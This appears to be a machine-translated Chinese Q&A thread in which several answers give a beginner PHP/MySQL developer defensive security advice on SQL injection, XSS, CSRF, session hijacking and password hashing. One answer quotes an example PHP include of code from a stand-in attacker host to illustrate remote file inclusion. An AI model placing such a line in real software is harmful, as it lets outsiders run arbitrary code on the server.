在发布我的网站之前，我需要多少网络安全知识？ [关闭]

Question

我正在编写我的第一个 php/mysql 站点，并意识到除了我在课程/书中学到的知识之外，我对安全性知之甚少。在发布自己的网站之前，我需要多少安全知识，而不必担心即使取得适度的成功也会吸引黑客并导致我的网站被入侵？

如果它有助于提供更多细节，我将创建一个允许用户添加纯文本内容以及浏览其他人添加的内容的网站。该文本旨在存储在数据库中。

Answer 1

了解 SQL 注入和 XSS。这一切都在验证用户输入。永远不要相信用户。

SQL Injections

XSS

最后最好的学习方法是因为安全性差而遭受攻击。然后你就会明白它是如何工作的。只有一个提示，进行备份。

Answer 2

这永远不够。但希望你会不断进步。也许当你准备好时，你就会了解自己。

了解最常见的安全问题，例如：

• Sql 注入
• 表单欺骗
• XSS

并记住：

• 始终验证用户输入（包括会话）
• 阻止访问不应公开的文件夹
• 使用河豚而不是 md5/sha1 作为密码
• 向最终用户隐藏错误（并记录下来）

还可以查看this guide，它总结了最著名的安全问题。

Answer 3

在您的网站中最关键的是用户可以向您的数据库提供文本。 在 stackoverflow 上阅读此问题，以获得有关如何防止 sql 注入的良好答案。 How to prevent sql injection in php

Answer 4

你不可能无所不知，所以这取决于你的代码有哪些可能的攻击媒介以及风险是什么。

问问自己：

• 我是否根据用户输入包含或读取文件？ 那么您应该知道，为什么白名单很重要以及流包装器的风险是什么（即include 'http://evil.example.com/hack.txt';）。见：PHP - Is "include" function secure?
• 我是输出用户生成的内容还是基于用户输入的内容？那你应该知道XSS（跨站脚本）是什么以及如何防止它
• 我是否使用动态 SQL 查询？ 那么您应该知道SQL Injections 是什么以及如何防止它们。旁注：不要再使用mysql_ 函数了。见：The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead
• 我使用会话吗？那么您应该知道Session Hijacking 是什么以及如何防止它。
• 我是否使用文件上传功能？那么您应该知道securing file uploads（PDF 链接）
• 我会处理用户密码吗？ 那么您应该了解最先进的密码散列技术，即 bcrypt。见：How do you use bcrypt for hashing passwords in PHP?
• 我是否使用特定于用户的表单？那么您应该了解CSRF（跨站请求伪造）以及如何防止它
• 我是否使用发送邮件的表单？ 那么您应该了解Email Injection 或使用您知道对其进行保护的库，例如swiftmailer。
• 我是否使用任何形式？那么不要使用PHP_SELF 作为它的动作，因为XSS is also a possible attack on $_SERVER variables。

此列表不完整，但应涵盖简单 Web 应用程序的最常见用例及其安全威胁

关于风险：

一旦您处理用户的敏感个人数据或在您自己的虚拟服务器上托管网站，您就有额外的责任，因为最坏的情况不再只是您的网站可能被破坏，而是私人数据可能会暴露，您的服务器可能会变成垃圾邮件机器人或更糟。

最重要的规则是：不要相信任何传入的数据

此规则的扩展，对初学者很重要：准确使用适合当前环境的度量。不要只将您知道的所有内容都扔给用户输入，并希望它会更安全，这会适得其反！我经常看到这样的问题：“如果我在所有 $_POST 变量上使用addslashes(mysql_real_escape_string(strip_tags(htmlspecialchars())))，我的应用程序是否安全？” - 如果您甚至认为这是一种有效的方法，那么您对有关用户输入的安全性如何工作有一个严重的误解。我重复一遍：什么是安全的，什么不是，总是取决于上下文！

Open Web Application Security Project

是一个很好的学习资源